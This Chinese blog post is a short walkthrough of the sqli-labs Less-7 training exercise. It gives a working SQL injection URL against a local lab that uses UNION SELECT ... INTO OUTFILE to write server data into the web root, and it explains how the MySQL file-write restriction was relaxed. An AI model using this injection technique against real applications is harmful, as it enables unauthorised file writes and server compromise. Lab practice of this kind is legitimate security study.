博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
【sqli-labs】Less7
阅读量:6410 次
发布时间:2019-06-23

本文共 441 字,大约阅读时间需要 1 分钟。

Less-7: 输出文件

sql导出文件语句

select * from table_test into outfile 'test.txt'

既然名字是输出文件,那肯定是和文件有关系。

首先,确保sql有写文件权限,即my.ini中有类似下面的语句。这里我作弊了,直接设置了sqli-labs-master的文件夹可以写文件。

secure_file_priv="D:/phpStudy/WWW/sqli-labs-master"

中间过程略过。最终写文件的语句为:

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1,2,@@version into outfile 'D:\\phpStudy\\WWW\\sqli-labs-master\\test_7.txt' -- a

直接通过http请求可以看到页面

http://127.0.0.1/sqli-labs-master/test_7.txt

 

转载地址:http://pizra.baihongyu.com/

你可能感兴趣的文章
Servlet和JSP优化经验总结
查看>>
squid使用rotate轮询(分割)日志
查看>>
VS2015安装EF Power Tools
查看>>
MySQL主从复制(笔记)
查看>>
keepalived高可用集群的简单配置
查看>>
Android Java Framework显示Toast(无Activity和Service)
查看>>
通过 SignalR 类库,实现 ASP.NET MVC 的实时通信
查看>>
NavigationController修改状态条颜色
查看>>
16大跨平台游戏引擎
查看>>
NPS如何配置基于mac地址的8021x认证
查看>>
XenServer架构之XAPI的调用流程
查看>>
redhat下搭建LAMP架构
查看>>
GitHub详细教程
查看>>
raid技术的读与想
查看>>
Hbase 中Column Family 的作用
查看>>
用鸡讲解技术债务的形成过程?
查看>>
Linux下的Tftp服务
查看>>
C#将集合和Json格式互相转换的几种方式
查看>>
java连接数据库并操作
查看>>
集群下文件同步问题
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-01-15 12:51:54   当前IP: 18.191.171.86   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我